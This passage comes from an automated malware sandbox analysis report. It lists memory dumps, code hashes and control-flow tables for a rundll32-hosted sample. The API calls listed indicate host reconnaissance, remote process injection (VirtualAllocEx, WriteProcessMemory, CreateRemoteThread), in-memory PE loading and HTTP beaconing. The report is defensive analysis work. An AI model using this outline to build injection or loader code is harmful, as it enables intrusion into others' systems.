Similarity
• API ID: AllocVirtual
• String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
• API String ID: 4275171209-1846638993
• Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
• Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
• Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
• Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700

Control-flow Graph

[Control-flow graph not preserved. Function entry: 1ff4caf4d00. API calls shown in the graph: GetUserNameW, GetComputerNameExW, GetTokenInformation, GetNativeSystemInfo, GetAdaptersInfo.]

Memory Dump Source
• Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
Similarity
• API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
• String ID:
• API String ID: 1596153048-0
• Opcode ID: d368cccdfef71661db8cb31f21f933e0a353851399cf2fd5481ceac7886dac6e
• Instruction ID: d75a71647335e16d5204bedfa28c6f6e0c251375c2fba80c83d207dfebb8f3da
• Opcode Fuzzy Hash: d368cccdfef71661db8cb31f21f933e0a353851399cf2fd5481ceac7886dac6e
• Instruction Fuzzy Hash: 32A1A530218F058FEB54EB15E8667EBB7E5FF94300F40457DA44AC3291EAB4D946CB92

Control-flow Graph

[Control-flow graph not preserved. Function entry: 273f41380. API calls shown in the graph: Sleep, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, WaitForSingleObject.]

Memory Dump Source
• Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
• Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
Similarity
• API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
• String ID: @
• API String ID: 3172812169-2766056989
• Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
• Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
• Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
• Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                      • API String ID: 3779972765-4108050209
                                                                                                                                                                                                                                                                      • Opcode ID: c2136968b619a1c25bf9ca9a098df95eb749b5ae94065cfc9453c6e842ee3bcc
                                                                                                                                                                                                                                                                      • Instruction ID: 130b3ce302a632e6cd1fcbf65161b32e72b8faedfb790ef99c022f570c99af2e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2136968b619a1c25bf9ca9a098df95eb749b5ae94065cfc9453c6e842ee3bcc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9715F30218B498FE794EF29D855BEBB7E5FF88300F50457DA58DC3292DBB094468B92
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2476801129.00007DF459570000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF459570000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_7df459570000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                                      • Instruction ID: 4037b94948a7d9021533d63a5c9d24bbc455437d2f8887dd752fed62c7c95525
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE71CD3161494C8FEB94EF68C858BAD37E1FB98355F104226E81ED73A0DB74D954CB84

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExitThreadUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3424019298-0
                                                                                                                                                                                                                                                                      • Opcode ID: 08f32d5bea543a41f381197dcaa5b21a13284e4198c1253caaeec1b6dd19c5dc
                                                                                                                                                                                                                                                                      • Instruction ID: d57d51d66012de59d098690238c4056b668bdf21f280062ca13bd8723b8dc030
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08f32d5bea543a41f381197dcaa5b21a13284e4198c1253caaeec1b6dd19c5dc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B251D274108E094FE748EF28E8597F677E1FB56311F10127DE49AC32A2DA78E802CB95

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressProcedure
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3653107232-0
                                                                                                                                                                                                                                                                      • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                                                                      • Instruction ID: a1c81268ac38ecb6163904c4fc687e26d8d816332a4eaa8d396f5ac05eb3d3f5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2131B231118B194BD668AF08EC467FBB7E1FB85310F50167EE5C6C3252E670A8868BD7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFirstSnapshotThread32Toolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 490256885-0
                                                                                                                                                                                                                                                                      • Opcode ID: 8947cd77792b9eb167b6165044dfe8b86d8111add7710d331631fdbc473ca148
                                                                                                                                                                                                                                                                      • Instruction ID: 992fb10a2c04b70258473829160b5c5857c99ce5a9d0d06986ab27bedc115690
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8947cd77792b9eb167b6165044dfe8b86d8111add7710d331631fdbc473ca148
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40727330118F198FE7A4EF18D895BE677E0FB98304F1545BD944DC72A6DB70A846CB82
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: e20a959d714a7abf9f0da5987a6fc1497fd2130fdd83c0d3aa6bad73de8a86e0
                                                                                                                                                                                                                                                                      • Instruction ID: 052c845032224b4fddabf5d64021b30ddb7b463968e7974c4ab850a8206e9499
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20a959d714a7abf9f0da5987a6fc1497fd2130fdd83c0d3aa6bad73de8a86e0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7C1D134118E4A8FE754EF58E8687EAB7E1FF55310F5051BDE48AC32A2DBB09842CB51
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 27eee718951805be4d6d661cb21cbd310f36feb23d9644bec408e17137dbdd0c
                                                                                                                                                                                                                                                                      • Instruction ID: 625b1b42bb5f769cbff26682836d39bb1860882f84071f84d02946569100898b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27eee718951805be4d6d661cb21cbd310f36feb23d9644bec408e17137dbdd0c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3416270124A498FF348DF28D8557ABB7E1FB48314F50567DE45AC32D6DBB88846CB81
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Instruction ID: 0572d7f0b80f9af12a14c9913ded387302c0da89d38a177be0de80c424946096
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0A4B0628B408BE744DF1884CA6767BE1FBD8745F24453EE989C7361CB3198828B43
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                                      • Instruction ID: 08ddfeeb2b1022a96227b6974a48b1fb8066a2ff9b268f9d7d293fdf3a95076f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0A4B0618B448BE744DF1884C967677E1FBD8755F24453EE999C7361CB319842CB43
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                                      • Instruction ID: 596b7c314ef086b00ecb35e7abf91b3343d535ab1ce2f170ab7b7a1dc3bb7cba
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611503c2f2b608366220324c20f94816b5761d40c9c053a388f9cbb19c4f0105
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F09070A28F044BD704AE28884A67637E2FBA8745F54063EA448C7361CB35A4428A43
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                                                                      • Instruction ID: 976508a2ef811da7e51f1c5a4127f85864e7fbe82eddd40f0119c12b8a978c98
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D0A77248DB194DE7209A98F8473F5B3D0FB81324F40443EC18CC1443D67E40464706

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 74 1ff4b0a2050-1ff4b0a209a call 1ff4b0a1340 77 1ff4b0a209c-1ff4b0a209e 74->77 78 1ff4b0a20a3-1ff4b0a20bd 74->78 79 1ff4b0a2640-1ff4b0a2647 77->79 80 1ff4b0a20d1-1ff4b0a20fa call 1ff4b0a1340 78->80 81 1ff4b0a20bf-1ff4b0a20cc SetLastError 78->81 84 1ff4b0a20fc-1ff4b0a20fe 80->84 85 1ff4b0a2103-1ff4b0a212a 80->85 81->79 84->79 86 1ff4b0a213e-1ff4b0a214c 85->86 87 1ff4b0a212c-1ff4b0a2139 SetLastError 85->87 88 1ff4b0a214e-1ff4b0a215b SetLastError 86->88 89 1ff4b0a2160-1ff4b0a216d 86->89 87->79 88->79 90 1ff4b0a2181-1ff4b0a21b1 89->90 91 1ff4b0a216f-1ff4b0a217c SetLastError 89->91 92 1ff4b0a21cb-1ff4b0a21d8 90->92 91->79 93 1ff4b0a21da-1ff4b0a21e3 92->93 94 1ff4b0a222b-1ff4b0a2286 GetNativeSystemInfo 92->94 95 1ff4b0a21fc-1ff4b0a220e 93->95 96 1ff4b0a21e5-1ff4b0a21fa 93->96 97 1ff4b0a229a-1ff4b0a22c5 VirtualAlloc 94->97 98 1ff4b0a2288-1ff4b0a2295 SetLastError 94->98 99 1ff4b0a2213-1ff4b0a221d 95->99 96->99 100 1ff4b0a22c7-1ff4b0a22eb VirtualAlloc 97->100 101 1ff4b0a22ff-1ff4b0a2324 GetProcessHeap HeapAlloc 97->101 98->79 102 1ff4b0a2229 99->102 103 1ff4b0a221f-1ff4b0a2224 99->103 100->101 104 1ff4b0a22ed-1ff4b0a22fa SetLastError 100->104 105 1ff4b0a234b-1ff4b0a2369 101->105 106 1ff4b0a2326-1ff4b0a2346 VirtualFree SetLastError 101->106 102->92 103->102 104->79 108 1ff4b0a236b-1ff4b0a2373 105->108 109 1ff4b0a2375 105->109 106->79 110 1ff4b0a237d-1ff4b0a23fe call 1ff4b0a1340 108->110 109->110 113 1ff4b0a240a-1ff4b0a24a7 VirtualAlloc call 1ff4b0a1120 call 1ff4b0a1380 110->113 114 1ff4b0a2400 110->114 121 1ff4b0a24ac-1ff4b0a24ae 113->121 115 1ff4b0a262c-1ff4b0a263e call 1ff4b0a28e0 114->115 115->79 122 1ff4b0a24ba-1ff4b0a24e3 121->122 123 1ff4b0a24b0 121->123 124 1ff4b0a2509-1ff4b0a250e 122->124 125 
1ff4b0a24e5-1ff4b0a2507 call 1ff4b0a1ab0 122->125 123->115 127 1ff4b0a2515-1ff4b0a2529 call 1ff4b0a1c80 124->127 125->127 131 1ff4b0a252b 127->131 132 1ff4b0a2535-1ff4b0a2549 call 1ff4b0a1790 127->132 131->115 135 1ff4b0a254b 132->135 136 1ff4b0a2555-1ff4b0a2569 call 1ff4b0a19f0 132->136 135->115 139 1ff4b0a256b 136->139 140 1ff4b0a2575-1ff4b0a2581 136->140 139->115 141 1ff4b0a2587-1ff4b0a2590 140->141 142 1ff4b0a2618-1ff4b0a261d 140->142 144 1ff4b0a25f7-1ff4b0a2612 141->144 145 1ff4b0a2592-1ff4b0a25d8 141->145 143 1ff4b0a2625-1ff4b0a262a 142->143 143->79 143->115 146 1ff4b0a2616 144->146 148 1ff4b0a25e9-1ff4b0a25f5 145->148 149 1ff4b0a25da-1ff4b0a25e5 SetLastError 145->149 146->143 148->146 149->115
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
• Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                      • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                                      • Instruction ID: 6218cd995dfbabc1f082e65d7df9272eabffc32ec4dce8c70c0e40effe67b034
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F1EC37219B89C6DB608B19E4907ABB7A0F79CB81F145439EB8E83B65DF78C445CB00

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 225 1ff4cad7830-1ff4cad7883 226 1ff4cad788a-1ff4cad7892 InternetOpenW 225->226 227 1ff4cad7885-1ff4cad7888 225->227 228 1ff4cad7898-1ff4cad78d7 InternetConnectW 226->228 229 1ff4cad7af9-1ff4cad7afd 226->229 227->226 228->229 230 1ff4cad78dd-1ff4cad792b HttpOpenRequestW 228->230 231 1ff4cad7aff-1ff4cad7b0c 229->231 230->231 232 1ff4cad7931-1ff4cad793b 230->232 233 1ff4cad7b0e-1ff4cad7b11 InternetCloseHandle 231->233 234 1ff4cad7b17-1ff4cad7b1a 231->234 235 1ff4cad793d-1ff4cad7945 232->235 236 1ff4cad7990-1ff4cad79ab 232->236 233->234 237 1ff4cad7b1c-1ff4cad7b1d 234->237 238 1ff4cad7b25-1ff4cad7b28 234->238 235->236 239 1ff4cad7947-1ff4cad798b call 1ff4cb02750 * 2 235->239 236->231 249 1ff4cad79b1-1ff4cad79ba 236->249 237->238 240 1ff4cad7b2a-1ff4cad7b2b 238->240 241 1ff4cad7b33-1ff4cad7b3b 238->241 239->236 240->241 243 1ff4cad7bd0-1ff4cad7be3 241->243 244 1ff4cad7b41-1ff4cad7b4b 241->244 247 1ff4cad7b4d-1ff4cad7b54 call 1ff4cb01230 244->247 248 1ff4cad7b62-1ff4cad7b73 244->248 247->248 263 1ff4cad7b56-1ff4cad7b60 call 1ff4cafb4e0 247->263 250 1ff4cad7b7a-1ff4cad7b8a call 1ff4cadcb60 248->250 251 1ff4cad7b75-1ff4cad7b78 248->251 253 1ff4cad79bc-1ff4cad79de call 1ff4cb01270 HttpSendRequestA 249->253 254 1ff4cad79e6-1ff4cad7a0a 249->254 265 1ff4cad7b8c-1ff4cad7bb8 call 1ff4cada050 call 1ff4cafb4e0 250->265 266 1ff4cad7bba-1ff4cad7bce call 1ff4cb01410 250->266 251->243 251->250 253->231 264 1ff4cad79e4-1ff4cad7a16 253->264 267 1ff4cad7a0c 254->267 263->243 275 1ff4cad7a18-1ff4cad7a1f call 1ff4cafb4e0 264->275 276 1ff4cad7a24-1ff4cad7a3b call 1ff4cafb4c0 264->276 265->243 266->243 266->263 267->253 275->276 283 1ff4cad7a3f-1ff4cad7a5b InternetQueryDataAvailable 276->283 284 
1ff4cad7ae3-1ff4cad7af7 call 1ff4cafb4e0 283->284 285 1ff4cad7a61-1ff4cad7a69 283->285 284->233 285->284 287 1ff4cad7a6b-1ff4cad7a7e 285->287 287->284 290 1ff4cad7a80-1ff4cad7a86 287->290 290->284 291 1ff4cad7a88-1ff4cad7a96 290->291 292 1ff4cad7aac-1ff4cad7aaf call 1ff4cafb4c0 291->292 293 1ff4cad7a98-1ff4cad7aaa 291->293 296 1ff4cad7ab4-1ff4cad7ade call 1ff4caf44a0 292->296 293->296 296->283
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataFreeHandleHeapQuerySend
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3768145577-0
                                                                                                                                                                                                                                                                      • Opcode ID: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                                                                      • Instruction ID: cebdfc696437e6c89b0340949d514d415a6916ae9c79afebccffe16837d1f81f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8B1A530218E0A8BE758DB18E8657BBB3E6FF94300F4415BDA446C7295DFB4D8428792
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: 0$@$@$`
                                                                                                                                                                                                                                                                      • API String ID: 0-307318802
                                                                                                                                                                                                                                                                      • Opcode ID: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                                      • Instruction ID: 386701b9c4ad2a39a23276fa2aaf34c9085106f1f5bf8f95c032a498f8f00254
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790f92f7944892e3d38ff7d826f4987b9e3c0bb28676424d5e8019a2330f5ae1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19B12A7061CB488FD7A4EF18D845BEAB7E0FB98714F104A6EE48DC3291DB74D9458B82
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                      • Opcode ID: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                                      • Instruction ID: ad075047989c3af1a4ec1c772cb0ce94a37660b566381b29d1c994ef185a9a90
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9457dfe6ec60ebb388675859c3b208fc461dcabcf6edda219dbca694cf0c5acf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37B17E31218E088FDB54EF1DC885BAABBE1FF98310F50466EE489C7251DB74E945CB82

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Fiber$CreateDelete
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2527733159-0
                                                                                                                                                                                                                                                                      • Opcode ID: a81c3d8a98be896dd9ba18f06cc8f029549e5d5c5a40f868ab439c78b2d98936
                                                                                                                                                                                                                                                                      • Instruction ID: 621590924576829e6efdd3473b3a3de129448aa4075aa87798427206b4ff0ee2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81c3d8a98be896dd9ba18f06cc8f029549e5d5c5a40f868ab439c78b2d98936
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51D530618D154BE768BB2CA85A7B673D1FB58310F20167DE89AC31E1DA649C03C6D2

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 384 1ff4b0a15e0-1ff4b0a15fc 385 1ff4b0a1608-1ff4b0a1617 384->385 386 1ff4b0a15fe-1ff4b0a1603 384->386 388 1ff4b0a1619-1ff4b0a162a 385->388 389 1ff4b0a168c-1ff4b0a169b 385->389 387 1ff4b0a1784-1ff4b0a1788 386->387 392 1ff4b0a162c-1ff4b0a1635 388->392 393 1ff4b0a1682-1ff4b0a1687 388->393 390 1ff4b0a16a7 389->390 391 1ff4b0a169d-1ff4b0a16a5 389->391 394 1ff4b0a16af-1ff4b0a16c6 390->394 391->394 395 1ff4b0a1637-1ff4b0a164a 392->395 396 1ff4b0a1664-1ff4b0a167c VirtualFree 392->396 393->387 397 1ff4b0a16c8-1ff4b0a16d0 394->397 398 1ff4b0a16d2 394->398 395->396 399 1ff4b0a164c-1ff4b0a1662 395->399 396->393 400 1ff4b0a16da-1ff4b0a16f1 397->400 398->400 399->393 399->396 401 1ff4b0a16fd 400->401 402 1ff4b0a16f3-1ff4b0a16fb 400->402 403 1ff4b0a1705-1ff4b0a1747 401->403 402->403 404 1ff4b0a1749-1ff4b0a1751 403->404 405 1ff4b0a1755-1ff4b0a1779 VirtualProtect 403->405 404->405 406 1ff4b0a177b-1ff4b0a177d 405->406 407 1ff4b0a177f 405->407 406->387 407->387
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
